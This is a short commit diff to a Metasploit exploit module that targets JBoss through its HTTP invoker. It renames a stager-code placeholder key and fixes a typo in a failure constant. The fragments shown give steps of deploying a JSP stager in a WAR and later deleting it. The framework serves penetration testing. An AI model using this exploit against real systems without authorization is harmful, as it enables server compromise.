Use easier key name

2015-01-22 18:11:48 -06:00 · 2015-01-22 18:11:48 -06:00 · 911485f536
parent f9dccda75d
commit 911485f536
1 changed files with 3 additions and 4 deletions
--- a/modules/exploits/multi/http/jboss_invoke_deploy.rb
+++ b/modules/exploits/multi/http/jboss_invoke_deploy.rb
@ -128,12 +128,11 @@ class Metasploit4 < Msf::Exploit::Remote
    name_parameter = rand_text_alpha(8)
    content_parameter = rand_text_alpha(8)
    stager_uri = "/#{regex_stager_app_base}/#{regex_stager_jsp_name}.jsp"
-    stager_code = "A" * 810		# 810 is the size of the stager in the serialized request

    replace_values = {
      'regex_app_base' => regex_stager_app_base,
      'regex_jsp_name' => regex_stager_jsp_name,
-      stager_code => generate_stager(name_parameter, content_parameter)
+      'jsp_code' => generate_stager(name_parameter, content_parameter)
    }

    print_status("Deploying stager")
@ -245,7 +244,7 @@ EOT
      data = build_install_stager(
        war_name: replace_params['regex_app_base'],
        jsp_name: replace_params['regex_jsp_name'],
-        data: replace_params["A" * 810]
+        data: replace_params['jsp_code']
      ).encode
    when 'removestagerfile.bin'
      data = build_delete_stager_file(
@ -260,7 +259,7 @@ EOT
        extension: '.war'
      ).encode
    else
-      fail_with(Failure::Unknow, "#{peer} - Unexpected operation")
+      fail_with(Failure::Unknown, "#{peer} - Unexpected operation")
    end

    res = send_request_cgi({